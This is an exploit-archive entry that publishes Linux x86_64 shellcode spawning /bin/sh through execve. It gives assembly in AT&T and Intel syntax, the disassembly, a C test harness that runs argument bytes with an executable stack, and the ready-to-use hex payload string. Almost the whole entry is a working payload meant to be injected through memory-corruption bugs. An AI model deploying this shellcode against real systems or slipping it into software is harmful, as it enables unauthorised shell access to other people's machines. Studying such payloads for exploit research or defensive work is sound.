# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach) # Date: 2015-09-10 # Exploit Author: Fanda Uchytil # Version: 1 # Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian) AT&T VERSION (for smooth debug) ------------------------------- .global _start .text _start: # int execve(const char *filename, char *const argv[], char *const envp[]); xor %rax, %rax add $59, %rax # Linux 64b execve xor %rdi, %rdi push %rdi # '\0' for termination of string below mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding) push %rdi lea (%rsp), %rdi xor %rsi, %rsi # no shell arguments xor %rdx, %rdx # no env vars syscall $ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt $ ./shellcode_atnt $ gdb -q ./shellcode_atnt Disassembly of section .text: 4000d4: 48 31 c0 xor %rax,%rax 4000d7: 48 83 c0 3b add $0x3b,%rax 4000db: 48 31 ff xor %rdi,%rdi 4000de: 57 push %rdi 4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi 4000e6: 2f 73 68 4000e9: 57 push %rdi 4000ea: 48 8d 3c 24 lea (%rsp),%rdi 4000ee: 48 31 f6 xor %rsi,%rsi 4000f1: 48 31 d2 xor %rdx,%rdx 4000f4: 0f 05 syscall INTEL VERSION ------------- BITS 64 xor rax, rax add rax, 59 xor rdi, rdi push rdi mov rdi, 0x68732F2f6e69622F push rdi lea rdi, [rsp] xor rsi, rsi xor rdx, rdx syscall $ nasm shellcode.a SHELLCODE_TEST.C ---------------- int main(int argc, char **argv) { int (*f)() = (int(*)()) argv[1]; return (*f)(); } $ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below $ ./shellcode_test "$(cat shellcode)" STRING ------ $ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g' \48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05 $ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"